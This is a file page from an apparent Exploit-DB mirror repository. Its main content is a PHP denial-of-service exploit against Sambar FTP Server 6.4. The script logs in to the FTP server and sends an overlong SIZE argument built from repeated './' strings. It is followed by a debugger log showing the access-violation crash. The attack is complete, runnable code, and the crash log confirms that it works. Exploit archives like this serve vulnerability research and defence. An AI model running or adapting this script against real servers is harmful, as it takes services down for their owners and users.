bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/2934.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

105 lines
4.2 KiB
PHP
Executable file
Raw Blame History

<?php
# Sambar FTP Server 6.4 SIZE Denial Of Service
# by rgod
# mail: retrog at alice dot it
# site: http://retrogod.altervista.org
# tested on WinXP sp2
error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3');
$user="test";
$pass="test";
$junk="";
for ($i=1; $i<=160; $i++){
$junk.="./";
}
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else {
echo "OK.\n";
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else {
echo "OK.\n";
}
$out=socket_read($socket, 240);
echo $out;
$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "SIZE ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));
socket_close($socket);
/*20:13:17.600 pid=0C50 tid=0148 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [2E2F2E7B])
----------------------------------------------------------------
EAX=2E2F2E2F: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=00000170: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=012CE7F0: 35 35 30 20 43 61 6E 27-74 20 61 63 63 65 73 73
ESP=012CE7C0: F0 E7 2C 01 FD FF FF FF-01 00 00 00 00 00 00 00
EBP=012CE900: 2F 2E 2F 2E 2F 2E 2F 2E-2F 2E 2F 2E 2F 2E 2F 2E
ESI=00A0E3C0: 00 00 00 00 28 60 E2 00-B0 C0 D3 00 78 A6 28 10
EDI=00A016A0: 01 00 00 00 01 00 00 00-0A 00 00 00 B6 0B 00 00
EIP=1008DB22: 8B 48 4C 51 8B 55 08 8B-42 58 50 E8 EE AD 18 00
--> MOV ECX,[EAX+4C]
----------------------------------------------------------------
20:13:17.610 pid=0C50 tid=0148 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [2E2F2E7B])
----------------------------------------------------------------
EAX=2E2F2E2F: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=00000170: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=012CE7F0: 35 35 30 20 43 61 6E 27-74 20 61 63 63 65 73 73
ESP=012CE7C0: F0 E7 2C 01 FD FF FF FF-01 00 00 00 00 00 00 00
EBP=012CE900: 2F 2E 2F 2E 2F 2E 2F 2E-2F 2E 2F 2E 2F 2E 2F 2E
ESI=00A0E3C0: 00 00 00 00 28 60 E2 00-B0 C0 D3 00 78 A6 28 10
EDI=00A016A0: 01 00 00 00 01 00 00 00-0A 00 00 00 B6 0B 00 00
EIP=1008DB22: 8B 48 4C 51 8B 55 08 8B-42 58 50 E8 EE AD 18 00
--> MOV ECX,[EAX+4C]
----------------------------------------------------------------
20:13:17.610 pid=0C50 tid=0148 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0D40 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=08A0 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0900 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0C44 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0750 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0244 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=04F0 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0AC4 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0870 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=01F0 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0114 Thread exited with code 3221225477
20:13:17.610 pid=0C50 tid=0ABC Process exited with code 3221225477
*/
?>
# milw0rm.com [2006-12-15]
Reference in a new issue View git blame Copy permalink